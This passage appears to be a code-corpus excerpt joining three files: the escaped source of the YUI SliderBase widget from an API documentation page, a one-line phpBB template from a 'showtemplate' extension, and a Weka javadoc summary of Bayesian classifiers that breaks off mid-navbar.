Sets the rail length according to the &lt;code&gt;length&lt;&#x2F;code&gt; attribute. * * @method _uiSetRailLength * @param length {String} the length to apply to the rail style * @protected *&#x2F; _uiSetRailLength: function ( length ) { this.rail.setStyle( this._key.dim, length ); }, &#x2F;** * Creates the Slider thumb DOM subtree for insertion into the Slider&#x27;s * rail. Override this method if you want to provide the thumb element * (presumably from existing markup). * * @method renderThumb * @return {Node} the thumb node subtree *&#x2F; renderThumb: function () { this._initThumbUrl(); var imageUrl = this.get( &#x27;thumbUrl&#x27; ); return Y.Node.create( Y.Lang.sub( this.THUMB_TEMPLATE, { thumbClass : this.getClassName( &#x27;thumb&#x27; ), thumbShadowClass: this.getClassName( &#x27;thumb&#x27;, &#x27;shadow&#x27; ), thumbImageClass : this.getClassName( &#x27;thumb&#x27;, &#x27;image&#x27; ), thumbShadowUrl : imageUrl, thumbImageUrl : imageUrl, thumbAriaLabelId: this.getClassName( &#x27;label&#x27;, Y.guid()) &#x2F;&#x2F; get unique id for specifying a label for ARIA } ) ); }, &#x2F;** * Gives focus to the thumb enabling keyboard access after clicking thumb * * @method _onThumbClick * @protected *&#x2F; _onThumbClick : function(e){ this.thumb.focus(); }, &#x2F;** * Creates the Y.DD.Drag instance used to handle the thumb movement and * binds Slider interaction to the configured value model. * * @method bindUI * @protected *&#x2F; bindUI : function () { &#x2F;&#x2F; Begin keyboard listeners &#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F; var boundingBox = this.get(&quot;boundingBox&quot;), &#x2F;&#x2F;Y.one(&#x27;body&#x27;), &#x2F;&#x2F; Looking for a key event which will fire continously across browsers while the key is held down. keyEvent = (!Y.UA.opera) ? &quot;down:&quot; : &quot;press:&quot;, &#x2F;&#x2F; 38, 40 = arrow up&#x2F;down, 33, 34 = page up&#x2F;down, 35 , 36 = end&#x2F;home keyEventSpec = keyEvent + &quot;38,40,33,34,35,36&quot;, &#x2F;&#x2F; 37 , 39 = arrow left&#x2F;right keyLeftRightSpec = keyEvent + &quot;37,39&quot;, &#x2F;&#x2F; 37 , 39 = arrow left&#x2F;right + meta (command&#x2F;apple key) for mac keyLeftRightSpecMeta = keyEvent + &quot;37+meta,39+meta&quot;; boundingBox.on(&quot;key&quot;, this._onDirectionKey, keyEventSpec, this); boundingBox.on(&quot;key&quot;, this._onLeftRightKey, keyLeftRightSpec, this); boundingBox.on(&quot;key&quot;, this._onLeftRightKeyMeta, keyLeftRightSpecMeta, this); &#x2F;&#x2F; End keyboard listeners &#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F; this.thumb.on(&#x27;click&#x27;, this._onThumbClick, this); this._bindThumbDD(); this._bindValueLogic(); this.after( &#x27;disabledChange&#x27;, this._afterDisabledChange ); this.after( &#x27;lengthChange&#x27;, this._afterLengthChange ); }, &#x2F;** * increments Slider value by a minor increment * * @method _incrMinor * @protected *&#x2F; _incrMinor : function(){ this.set(&#x27;value&#x27;, (this.get(&#x27;value&#x27;) + this.get(&#x27;minorStep&#x27;))); }, &#x2F;** * decrements Slider value by a minor increment * * @method _decrMinor * @protected *&#x2F; _decrMinor : function(){ this.set(&#x27;value&#x27;, (this.get(&#x27;value&#x27;) - this.get(&#x27;minorStep&#x27;))); }, &#x2F;** * increments Slider value by a major increment * * @method _incrMajor * @protected *&#x2F; _incrMajor : function(){ this.set(&#x27;value&#x27;, (this.get(&#x27;value&#x27;) + this.get(&#x27;majorStep&#x27;))); }, &#x2F;** * decrements Slider value by a major increment * * @method _decrMajor * @protected *&#x2F; _decrMajor : function(){ this.set(&#x27;value&#x27;, (this.get(&#x27;value&#x27;) - this.get(&#x27;majorStep&#x27;))); }, &#x2F;** * sets the Slider value to the min value. * * @method _setToMin * @protected *&#x2F; _setToMin : function(e){ this.set(&#x27;value&#x27;, this.get(&#x27;min&#x27;)); }, &#x2F;** * sets the Slider value to the max value. * * @method _setToMax * @protected *&#x2F; _setToMax : function(e){ this.set(&#x27;value&#x27;, this.get(&#x27;max&#x27;)); }, &#x2F;** * sets the Slider&#x27;s value in response to key events. * Left and right keys are in a separate method * in case an implementation wants to increment values * but needs left and right arrow keys for other purposes. * * @method _onDirectionKey * @param e {Event} the key event * @protected *&#x2F; _onDirectionKey : function(e) { e.preventDefault(); if(this.get(&#x27;disabled&#x27;) === false){ switch (e.charCode) { case 38: &#x2F;&#x2F; up this._incrMinor(); break; case 40: &#x2F;&#x2F; down this._decrMinor(); break; case 36: &#x2F;&#x2F; home this._setToMin(); break; case 35: &#x2F;&#x2F; end this._setToMax(); break; case 33: &#x2F;&#x2F; page up this._incrMajor(); break; case 34: &#x2F;&#x2F; page down this._decrMajor(); break; } } }, &#x2F;** * sets the Slider&#x27;s value in response to left or right key events * * @method _onLeftRightKey * @param e {Event} the key event * @protected *&#x2F; _onLeftRightKey : function(e) { e.preventDefault(); if(this.get(&#x27;disabled&#x27;) === false){ switch (e.charCode) { case 37: &#x2F;&#x2F; left this._decrMinor(); break; case 39: &#x2F;&#x2F; right this._incrMinor(); break; } } }, &#x2F;** * sets the Slider&#x27;s value in response to left or right key events when a meta (mac command&#x2F;apple) key is also pressed * * @method _onLeftRightKeyMeta * @param e {Event} the key event * @protected *&#x2F; _onLeftRightKeyMeta : function(e) { e.preventDefault(); if(this.get(&#x27;disabled&#x27;) === false){ switch (e.charCode) { case 37: &#x2F;&#x2F; left + meta this._setToMin(); break; case 39: &#x2F;&#x2F; right + meta this._setToMax(); break; } } }, &#x2F;** * Makes the thumb draggable and constrains it to the rail. * * @method _bindThumbDD * @protected *&#x2F; _bindThumbDD: function () { var config = { constrain: this.rail }; &#x2F;&#x2F; { constrain: rail, stickX: true } config[ &#x27;stick&#x27; + this.axis.toUpperCase() ] = true; &#x2F;** * The DD.Drag instance linked to the thumb node. * * @property _dd * @type {DD.Drag} * @protected *&#x2F; this._dd = new Y.DD.Drag( { node : this.thumb, bubble : false, on : { &#x27;drag:start&#x27;: Y.bind( this._onDragStart, this ) }, after : { &#x27;drag:drag&#x27;: Y.bind( this._afterDrag, this ), &#x27;drag:end&#x27; : Y.bind( this._afterDragEnd, this ) } } ); &#x2F;&#x2F; Constrain the thumb to the rail this._dd.plug( Y.Plugin.DDConstrained, config ); }, &#x2F;** * Stub implementation. Override this (presumably in a class extension) to * initialize any value logic that depends on the presence of the Drag * instance. * * @method _bindValueLogic * @protected *&#x2F; _bindValueLogic: function () {}, &#x2F;** * Moves the thumb to pixel offset position along the rail. * * @method _uiMoveThumb * @param offset {Number} the pixel offset to set as left or top style * @param [options] {Object} Details to send with the &#x60;thumbMove&#x60; event * @protected *&#x2F; _uiMoveThumb: function ( offset, options ) { if ( this.thumb ) { this.thumb.setStyle( this._key.minEdge, offset + &#x27;px&#x27; ); Y.log(&quot;Setting thumb &quot; + this._key.minEdge + &quot; to &quot; + offset + &quot;px&quot;,&quot;info&quot;,&quot;slider&quot;); options || (options = {}); options.offset = offset; this.fire( &#x27;thumbMove&#x27;, options ); } }, &#x2F;** * Dispatches the &lt;code&gt;slideStart&lt;&#x2F;code&gt; event. * * @method _onDragStart * @param e {Event} the &lt;code&gt;drag:start&lt;&#x2F;code&gt; event from the thumb * @protected *&#x2F; _onDragStart: function ( e ) { &#x2F;** * Signals the beginning of a thumb drag operation. Payload includes * the thumb&#x27;s drag:start event. * * @event slideStart * @param event {Event} The event object for the slideStart with the * following extra properties: * &lt;dl&gt; * &lt;dt&gt;ddEvent (deprecated)&lt;&#x2F;dt&gt; * &lt;dd&gt;&lt;code&gt;drag:start&lt;&#x2F;code&gt; event from the thumb&lt;&#x2F;dd&gt; * &lt;dt&gt;originEvent&lt;&#x2F;dt&gt; * &lt;dd&gt;&lt;code&gt;drag:start&lt;&#x2F;code&gt; event from the thumb&lt;&#x2F;dd&gt; * &lt;&#x2F;dl&gt; *&#x2F; this.fire(&#x27;slideStart&#x27;, { ddEvent: e, &#x2F;&#x2F; for backward compatibility originEvent: e }); }, &#x2F;** * Dispatches the &lt;code&gt;thumbMove&lt;&#x2F;code&gt; event. * * @method _afterDrag * @param e {Event} the &lt;code&gt;drag:drag&lt;&#x2F;code&gt; event from the thumb * @protected *&#x2F; _afterDrag: function ( e ) { var thumbXY = e.info.xy[ this._key.xyIndex ], railXY = e.target.con._regionCache[ this._key.minEdge ]; Y.log(&quot;Thumb position: &quot; + thumbXY + &quot;, Rail position: &quot; + railXY, &quot;info&quot;, &quot;slider&quot;); this.fire( &#x27;thumbMove&#x27;, { offset : (thumbXY - railXY), ddEvent: e, &#x2F;&#x2F; for backward compatibility originEvent: e } ); }, &#x2F;** * Dispatches the &lt;code&gt;slideEnd&lt;&#x2F;code&gt; event. * * @method _onDragEnd * @param e {Event} the &lt;code&gt;drag:end&lt;&#x2F;code&gt; event from the thumb * @protected *&#x2F; _afterDragEnd: function ( e ) { &#x2F;** * Signals the end of a thumb drag operation. Payload includes * the thumb&#x27;s drag:end event. * * @event slideEnd * @param event {Event} The event object for the slideEnd with the * following extra properties: * &lt;dl&gt; * &lt;dt&gt;ddEvent (deprecated)&lt;&#x2F;dt&gt; * &lt;dd&gt;&lt;code&gt;drag:end&lt;&#x2F;code&gt; event from the thumb&lt;&#x2F;dd&gt; * &lt;dt&gt;originEvent&lt;&#x2F;dt&gt; * &lt;dd&gt;&lt;code&gt;drag:end&lt;&#x2F;code&gt; event from the thumb&lt;&#x2F;dd&gt; * &lt;&#x2F;dl&gt; *&#x2F; this.fire(&#x27;slideEnd&#x27;, { ddEvent: e, originEvent: e }); }, &#x2F;** * Locks or unlocks the thumb. * * @method _afterDisabledChange * @param e {Event} The disabledChange event object * @protected *&#x2F; _afterDisabledChange: function ( e ) { this._dd.set( &#x27;lock&#x27;, e.newVal ); }, &#x2F;** * Handles changes to the &lt;code&gt;length&lt;&#x2F;code&gt; attribute. By default, it * triggers an update to the UI. * * @method _afterLengthChange * @param e {Event} The lengthChange event object * @protected *&#x2F; _afterLengthChange: function ( e ) { if ( this.get( &#x27;rendered&#x27; ) ) { this._uiSetRailLength( e.newVal ); this.syncUI(); } }, &#x2F;** * Synchronizes the DOM state with the attribute settings. * * @method syncUI *&#x2F; syncUI : function () { this._dd.con.resetCache(); this._syncThumbPosition(); &#x2F;&#x2F; Forces a reflow of the bounding box to address IE8 inline-block &#x2F;&#x2F; container not expanding correctly. bug 2527905 &#x2F;&#x2F;this.get(&#x27;boundingBox&#x27;).toggleClass(&#x27;&#x27;); this.thumb.set(&#x27;aria-valuemin&#x27;, this.get(&#x27;min&#x27;)); this.thumb.set(&#x27;aria-valuemax&#x27;, this.get(&#x27;max&#x27;)); this._dd.set(&#x27;lock&#x27;, this.get(&#x27;disabled&#x27;)); }, &#x2F;** * Stub implementation. Override this (presumably in a class extension) to * ensure the thumb is in the correct position according to the value * alogorithm. * instance. * * @method _syncThumbPosition * @protected *&#x2F; _syncThumbPosition: function () {}, &#x2F;** * Validates the axis is &amp;quot;x&amp;quot; or &amp;quot;y&amp;quot; (case insensitive). * Converts to lower case for storage. * * @method _setAxis * @param v {String} proposed value for the axis attribute * @return {String} lowercased first character of the input string * @protected *&#x2F; _setAxis : function (v) { v = ( v + &#x27;&#x27; ).toLowerCase(); return ( v === &#x27;x&#x27; || v === &#x27;y&#x27; ) ? v : INVALID_VALUE; }, &#x2F;** * &lt;p&gt;Ensures the stored length value is a string with a quantity and unit. * Unit will be defaulted to &amp;quot;px&amp;quot; if not included. Rejects * values less than or equal to 0 and those that don&#x27;t at least start with * a number.&lt;&#x2F;p&gt; * * &lt;p&gt;Currently only pixel lengths are supported.&lt;&#x2F;p&gt; * * @method _setLength * @param v {String} proposed value for the length attribute * @return {String} the sanitized value * @protected *&#x2F; _setLength: function ( v ) { v = ( v + &#x27;&#x27; ).toLowerCase(); var length = parseFloat( v, 10 ), units = v.replace( &#x2F;[\d\.\-]&#x2F;g, &#x27;&#x27; ) || this.DEF_UNIT; return length &gt; 0 ? ( length + units ) : INVALID_VALUE; }, &#x2F;** * &lt;p&gt;Defaults the thumbURL attribute according to the current skin, or * &amp;quot;sam&amp;quot; if none can be determined. Horizontal Sliders will have * their &lt;code&gt;thumbUrl&lt;&#x2F;code&gt; attribute set to&lt;&#x2F;p&gt; * &lt;p&gt;&lt;code&gt;&amp;quot;&#x2F;&lt;em&gt;configured&lt;&#x2F;em&gt;&#x2F;&lt;em&gt;yu&lt;&#x2F;em&gt;i&#x2F;&lt;em&gt;builddi&lt;&#x2F;em&gt;r&#x2F;slider-base&#x2F;assets&#x2F;skins&#x2F;sam&#x2F;thumb-x.png&amp;quot;&lt;&#x2F;code&gt;&lt;&#x2F;p&gt; * &lt;p&gt;And vertical thumbs will get&lt;&#x2F;p&gt; * &lt;p&gt;&lt;code&gt;&amp;quot;&#x2F;&lt;em&gt;configured&lt;&#x2F;em&gt;&#x2F;&lt;em&gt;yui&lt;&#x2F;em&gt;&#x2F;&lt;em&gt;builddir&lt;&#x2F;em&gt;&#x2F;slider-base&#x2F;assets&#x2F;skins&#x2F;sam&#x2F;thumb-y.png&amp;quot;&lt;&#x2F;code&gt;&lt;&#x2F;p&gt; * * @method _initThumbUrl * @protected *&#x2F; _initThumbUrl: function () { if (!this.get(&#x27;thumbUrl&#x27;)) { var skin = this.getSkinName() || &#x27;sam&#x27;, base = Y.config.base; &#x2F;&#x2F; Unfortunate hack to avoid requesting image resources from the &#x2F;&#x2F; combo service. The combo service does not serve images. if (base.indexOf(&#x27;http:&#x2F;&#x2F;yui.yahooapis.com&#x2F;combo&#x27;) === 0) { base = &#x27;http:&#x2F;&#x2F;yui.yahooapis.com&#x2F;&#x27; + Y.version + &#x27;&#x2F;build&#x2F;&#x27;; } &#x2F;&#x2F; &lt;img src=&quot;&#x2F;path&#x2F;to&#x2F;build&#x2F;slider-base&#x2F;assets&#x2F;skins&#x2F;sam&#x2F;thumb-x.png&quot;&gt; this.set(&#x27;thumbUrl&#x27;, base + &#x27;slider-base&#x2F;assets&#x2F;skins&#x2F;&#x27; + skin + &#x27;&#x2F;thumb-&#x27; + this.axis + &#x27;.png&#x27;); } }, &#x2F;** * Bounding box template that will contain the Slider&#x27;s DOM subtree. &amp;lt;span&amp;gt;s are used to support inline-block styling. * * @property BOUNDING_TEMPLATE * @type {String} * @default &amp;lt;span&gt;&amp;lt;&#x2F;span&gt; *&#x2F; BOUNDING_TEMPLATE : &#x27;&lt;span&gt;&lt;&#x2F;span&gt;&#x27;, &#x2F;** * Content box template that will contain the Slider&#x27;s rail and thumb. * * @property CONTENT_TEMPLATE * @type {String} * @default &amp;lt;span&gt;&amp;lt;&#x2F;span&gt; *&#x2F; CONTENT_TEMPLATE : &#x27;&lt;span&gt;&lt;&#x2F;span&gt;&#x27;, &#x2F;** * Rail template that will contain the end caps and the thumb. * {placeholder}s are used for template substitution at render time. * * @property RAIL_TEMPLATE * @type {String} * @default &amp;lt;span class=&quot;{railClass}&quot;&gt;&amp;lt;span class=&quot;{railMinCapClass}&quot;&gt;&amp;lt;&#x2F;span&gt;&amp;lt;span class=&quot;{railMaxCapClass}&quot;&gt;&amp;lt;&#x2F;span&gt;&amp;lt;&#x2F;span&gt; *&#x2F; RAIL_TEMPLATE : &#x27;&lt;span class=&quot;{railClass}&quot;&gt;&#x27; + &#x27;&lt;span class=&quot;{railMinCapClass}&quot;&gt;&lt;&#x2F;span&gt;&#x27; + &#x27;&lt;span class=&quot;{railMaxCapClass}&quot;&gt;&lt;&#x2F;span&gt;&#x27; + &#x27;&lt;&#x2F;span&gt;&#x27;, &#x2F;** * Thumb template that will contain the thumb image and shadow. &amp;lt;img&gt; * tags are used instead of background images to avoid a flicker bug in IE. * {placeholder}s are used for template substitution at render time. * * @property THUMB_TEMPLATE * @type {String} * @default &amp;lt;span class=&quot;{thumbClass}&quot; tabindex=&quot;-1&quot;&gt;&amp;lt;img src=&quot;{thumbShadowUrl}&quot; alt=&quot;Slider thumb shadow&quot; class=&quot;{thumbShadowClass}&quot;&gt;&amp;lt;img src=&quot;{thumbImageUrl}&quot; alt=&quot;Slider thumb&quot; class=&quot;{thumbImageClass}&quot;&gt;&amp;lt;&#x2F;span&gt; *&#x2F; THUMB_TEMPLATE : &#x27;&lt;span class=&quot;{thumbClass}&quot; aria-labelledby=&quot;{thumbAriaLabelId}&quot; aria-valuetext=&quot;&quot; aria-valuemax=&quot;&quot; aria-valuemin=&quot;&quot; aria-valuenow=&quot;&quot; role=&quot;slider&quot; tabindex=&quot;0&quot;&gt;&#x27; + &#x2F;&#x2F; keyboard access jeff tabindex=&quot;-1&quot; &#x27;&lt;img src=&quot;{thumbShadowUrl}&quot; &#x27; + &#x27;alt=&quot;Slider thumb shadow&quot; &#x27; + &#x27;class=&quot;{thumbShadowClass}&quot;&gt;&#x27; + &#x27;&lt;img src=&quot;{thumbImageUrl}&quot; &#x27; + &#x27;alt=&quot;Slider thumb&quot; &#x27; + &#x27;class=&quot;{thumbImageClass}&quot;&gt;&#x27; + &#x27;&lt;&#x2F;span&gt;&#x27; }, { &#x2F;&#x2F; Y.SliderBase static properties &#x2F;** * The identity of the widget. * * @property NAME * @type String * @default &#x27;sliderBase&#x27; * @readOnly * @protected * @static *&#x2F; NAME : &#x27;sliderBase&#x27;, &#x2F;** * Static property used to define the default attribute configuration of * the Widget. * * @property ATTRS * @type {Object} * @protected * @static *&#x2F; ATTRS : { &#x2F;** * Axis upon which the Slider&#x27;s thumb moves. &amp;quot;x&amp;quot; for * horizontal, &amp;quot;y&amp;quot; for vertical. * * @attribute axis * @type {String} * @default &amp;quot;x&amp;quot; * @writeOnce *&#x2F; axis : { value : &#x27;x&#x27;, writeOnce : true, setter : &#x27;_setAxis&#x27;, lazyAdd : false }, &#x2F;** * The length of the rail (exclusive of the end caps if positioned by * CSS). This corresponds to the movable range of the thumb. * * @attribute length * @type {String | Number} e.g. &quot;200px&quot; or 200 * @default 150px *&#x2F; length: { value: &#x27;150px&#x27;, setter: &#x27;_setLength&#x27; }, &#x2F;** * Path to the thumb image. This will be used as both the thumb and * shadow as a sprite. Defaults at render() to thumb-x.png or * thumb-y.png in the skin directory of the current skin. * * @attribute thumbUrl * @type {String} * @default thumb-x.png or thumb-y.png in the sam skin directory of the * current build path for Slider *&#x2F; thumbUrl: { value: null, validator: Y.Lang.isString } } }); </pre> </div> </div> </div> </div> </div> </div> </div> <script src="..&#x2F;assets/vendor/prettify/prettify-min.js"></script> <script>prettyPrint();</script> <script src="..&#x2F;assets/js/yui-prettify.js"></script> <script src="..&#x2F;assets/../api.js"></script> <script src="..&#x2F;assets/js/api-filter.js"></script> <script src="..&#x2F;assets/js/api-list.js"></script> <script src="..&#x2F;assets/js/api-search.js"></script> <script src="..&#x2F;assets/js/apidocs.js"></script> </body> </html>
styles/all/template/event/overall_header_breadcrumbs_after.html
LotusJeff/showtemplate
<div class='lotusjeff_showtemplate'>overall_header_breadcrumbs_after</div>
weka/doc/weka/classifiers/bayes/package-summary.html
chrissalij/Wiki-Reputation-Predictor
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_17) on Mon Jan 11 20:36:41 NZDT 2010 --> <TITLE> weka.classifiers.bayes </TITLE> <META NAME="date" CONTENT="2010-01-11"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="weka.classifiers.bayes"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="http://www.cs.waikato.ac.nz/ml/weka/" target="_blank"><FONT CLASS="NavBarFont1"><B>Weka's home</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../weka/classifiers/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../weka/classifiers/bayes/blr/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?weka/classifiers/bayes/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <H2> Package weka.classifiers.bayes </H2> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Class Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/AODE.html" title="class in weka.classifiers.bayes">AODE</A></B></TD> <TD>AODE achieves highly accurate classification by averaging over all of a small space of alternative naive-Bayes-like models that have weaker (and hence less detrimental) independence assumptions than naive Bayes.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/AODEsr.html" title="class in weka.classifiers.bayes">AODEsr</A></B></TD> <TD>AODEsr augments AODE with Subsumption Resolution.AODEsr detects specializations between two attribute values at classification time and deletes the generalization attribute value.<br/> For more information, see:<br/> Fei Zheng, Geoffrey I.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/BayesianLogisticRegression.html" title="class in weka.classifiers.bayes">BayesianLogisticRegression</A></B></TD> <TD>Implements Bayesian Logistic Regression for both Gaussian and Laplace Priors.<br/> <br/> For more information, see<br/> <br/> Alexander Genkin, David D.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/BayesNet.html" title="class in weka.classifiers.bayes">BayesNet</A></B></TD> <TD>Bayes Network learning using various search algorithms and quality measures.<br/> Base class for a Bayes Network classifier.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/ComplementNaiveBayes.html" title="class in weka.classifiers.bayes">ComplementNaiveBayes</A></B></TD> <TD>Class for building and using a Complement class Naive Bayes classifier.<br/> <br/> For more information see, <br/> <br/> Jason D.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/DMNBtext.html" title="class in weka.classifiers.bayes">DMNBtext</A></B></TD> <TD>Class for building and using a Discriminative Multinomial Naive Bayes classifier.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/HNB.html" title="class in weka.classifiers.bayes">HNB</A></B></TD> <TD>Contructs Hidden Naive Bayes classification model with high classification accuracy and AUC.<br/> <br/> For more information refer to:<br/> <br/> H.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/NaiveBayes.html" title="class in weka.classifiers.bayes">NaiveBayes</A></B></TD> <TD>Class for a Naive Bayes classifier using estimator classes.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/NaiveBayesMultinomial.html" title="class in weka.classifiers.bayes">NaiveBayesMultinomial</A></B></TD> <TD>Class for building and using a multinomial Naive Bayes classifier.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/NaiveBayesMultinomialUpdateable.html" title="class in weka.classifiers.bayes">NaiveBayesMultinomialUpdateable</A></B></TD> <TD>Class for building and using a multinomial Naive Bayes classifier.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/NaiveBayesSimple.html" title="class in weka.classifiers.bayes">NaiveBayesSimple</A></B></TD> <TD>Class for building and using a simple Naive Bayes classifier.Numeric attributes are modelled by a normal distribution.<br/> <br/> For more information, see<br/> <br/> Richard Duda, Peter Hart (1973).</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/NaiveBayesUpdateable.html" title="class in weka.classifiers.bayes">NaiveBayesUpdateable</A></B></TD> <TD>Class for a Naive Bayes classifier using estimator classes.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../weka/classifiers/bayes/WAODE.html" title="class in weka.classifiers.bayes">WAODE</A></B></TD> <TD>WAODE contructs the model called Weightily Averaged One-Dependence Estimators.<br/> <br/> For more information, see<br/> <br/> L.</TD> </TR> </TABLE> &nbsp; <P> <DL> </DL> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="http://www.cs.waikato.ac.nz/ml/weka/" 